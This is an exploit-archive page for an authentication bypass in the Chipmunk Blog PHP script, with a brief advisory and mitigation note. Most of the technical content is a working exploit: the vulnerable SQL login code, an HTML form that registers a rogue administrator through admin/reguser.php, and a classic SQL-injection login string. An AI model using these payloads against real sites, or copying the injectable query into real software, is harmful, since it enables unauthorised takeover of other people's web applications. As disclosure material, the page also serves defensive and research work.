header-logo
Suggest Exploit
vendor:
Chipmunk Blog
by:
x0r
7.5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: Chipmunk Blog
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Chipmunk Blog Add Admin Exploit/Auth Bypass

Chipmunk Blog is vulnerable to an authentication bypass vulnerability. An attacker can exploit this vulnerability to gain administrative access to the application. This is due to the application not properly sanitizing user-supplied input to the 'username' and 'password' parameters in the 'reguser.php' and 'authenticate.php' scripts. An attacker can exploit this vulnerability by supplying a specially crafted 'username' and 'password' parameters when authenticating to the application.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to modify the application's logic. Additionally, the application should use a secure authentication mechanism to ensure that only authorized users can access the application.
Source

Exploit-DB raw data:

#########################################################################################
[0x01] Informations:

Script         : Chipmunk Blog
Download       : http://www.chipmunk-scripts.com/blog/blog.zip
Vulnerability  : Add Admin Exploit\Auth Bypass
Author         : x0r
Contact        : x0r@live.it \ andry2000@hotmail.it
Website        : NULL

#########################################################################################
[0x02] Bug: \admin\reguser.php \admin\authenticate.php

if (isset($_POST['submit'])) // name of submit button
{
   $username=$_POST['username'];
   $password=$_POST['password'];
   $password=md5($password);
   $getadmin="SELECT * from bl_admin where username='$username' and
password='$password'";
   $getadmin2=mysql_query($getadmin) or die("Could not get admin");


#########################################################################################
[0x03] Exploit:

Add Admin:

<html>
<head>
<title> Chipmunk Blog (reguser.php) Add Admin Exploit (html)</title>
</head>
<body>
<form action=http://xxxxxxx/blog/admin/reguser.php method=post>
Username:<br>
<input type=text name='username' value='x0r' size="20"><br>
Password:<br>
<input type=text name='password' value='h4x0rz' size="20"><br>
<input type="text" name="pass2" value='h4x0rz' size="15"><br>
<input type=submit name='submit' value='submit'><br>
</form>
</body>
</html>

Exploit2: admin ' or ' 1=1--
#########################################################################################

# milw0rm.com [2009-01-28]

Navigation

Suggest Exploit

Services By CQR